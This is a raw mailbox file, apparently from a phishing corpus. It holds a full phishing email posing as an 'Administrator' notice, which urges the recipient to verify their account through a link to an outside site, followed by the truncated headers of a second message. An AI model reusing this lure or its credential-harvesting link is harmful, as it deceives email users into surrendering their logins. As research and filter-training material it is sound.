From: Mail Service <jibironke@dwsd.org>
Message-ID: <1446414091.34168.1445101022210.JavaMail.root@csf-mail-zimbra.dwsd.org>
Subject: Message From Administrator
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_34167_736698378.1445101022206"
X-Originating-IP: [192.168.110.25]
X-Mailer: Zimbra 6.0.6_GA_2324.RHEL5_64 (zclient/6.0.6_GA_2324.RHEL5_64)
To: undisclosed-recipients:;
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 207

------=_Part_34167_736698378.1445101022206
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: 7bit



Your email Address require security updates and verification.
Click here to proceed with your Email update.
------=_Part_34167_736698378.1445101022206
Content-Type: text/html; charset=utf-8
Content-Transfer-Encoding: 7bit

<html><head><style> body {height: 100%; color:#000000; font-size:12pt; font-family:Times New Roman;}</style></head><body><br><br><div class="ecxaolReplacedBody"><strong><span style="FONT-SIZE: 18px"><span style="FONT-SIZE: 17px"><span style="FONT-SIZE: 16px"><span style="FONT-SIZE: 18px"><span style="FONT-SIZE: 17px"><span style="FONT-SIZE: 16px"><span style="FONT-SIZE: 15px"><span style="FONT-SIZE: 18px"><span style="FONT-SIZE: 17px"><span style="FONT-SIZE: 16px"><span style="FONT-SIZE: 15px"><span style="FONT-SIZE: 15px"><span style="FONT-SIZE: 15px">Your email Address require security updates and verification.</span></span></span></span></span></span></span></span></span></span></span></span></span></strong><br><div class="ecxaolReplacedBody"><strong><a href="http://www.facturailimitada.com/logs/" target="_blank">Click here to proceed with your Email update.</a></strong></div></div></body></html>
------=_Part_34167_736698378.1445101022206--

From supplyst@esprit.turboservers.com.au  Sun Oct 18 22:19:56 2015
Return-Path: <supplyst@esprit.turboservers.com.au>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from forward.b.hostedemail.com (forward.b.hostedemail.com [64.98.36.17])
	by l.monkey.org (Postfix) with ESMTP id D018CF412F
	for <jose@login.monkey.org>; Sun, 18 Oct 2015 22:19:56 -0500 (CDT)
Received: from smtpin15.hostedemail.com (10.5.19.248.rfc1918.com [10.5.19.248])
	by ofarelay01.b.hostedemail.com (Postfix) with SMTP id 95A3034E1AE
	for <jose@login.monkey.org>; Mon, 19 Oct 2015 03:19:56 +0000 (UTC)
X-Forwarded-For: jose@monkey.org by Hostedemail
Delivered-To: jose@monkey.org
X-FDA: 70757403192.15.swing02_70f154973285e
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none; dkim-atps=neutral
X-Spam-Summary: 69,4.5,0,e25e225017b32023,d41d8cd98f00b204,supplyst@esprit.turboservers.com.au,:,RULES_HIT:41:46:150:153:355:379:543:966:967:969:973:978:982:988:989:1077:1216:1260:1263:1277:1311:1313:1314:1345:1381:1430:1437:1513:1515:1516:1518:1521:1534:1537:1566:1593:1594:1676:1711:1714:1730:1747:1777:1792:2196:2199:2393:2525:2549:2560:2563:2682:2685:2693:2859:2896:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3740:3770:3867:3868:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4385:4641:5007:6261:6684:7809:7903:8599:8906:9025:9149:10009:10400:10426:11658:11914:12295:12855:13069:13302:13311:13357:14370:19902:19997:21080,0,RBL:neutral,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:neutral,Custom_rules:0:1:0
X-HE-Tag: swing02_70f154973285e
X-Filterd-Recvd-Size: 1596
Received: from esprit.turboservers.com.au (unknown [122.201.120.185])
	by imf01.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon, 19 Oct 2015 03:19:36 +0000 (UTC)
Received: from supplyst by esprit.turboservers.com.au with local (Exim 4.82)
	(envelope-from <supplyst@esprit.turboservers.com.au>)
	id 1Zo0z1-0005Gp-4r
	for jose@monkey.org; Mon, 19 Oct 2015 14:19:35 +1100
Date: Mon, 19 Oct 2015 14:19:35 +1100
To: jose@monkey.org
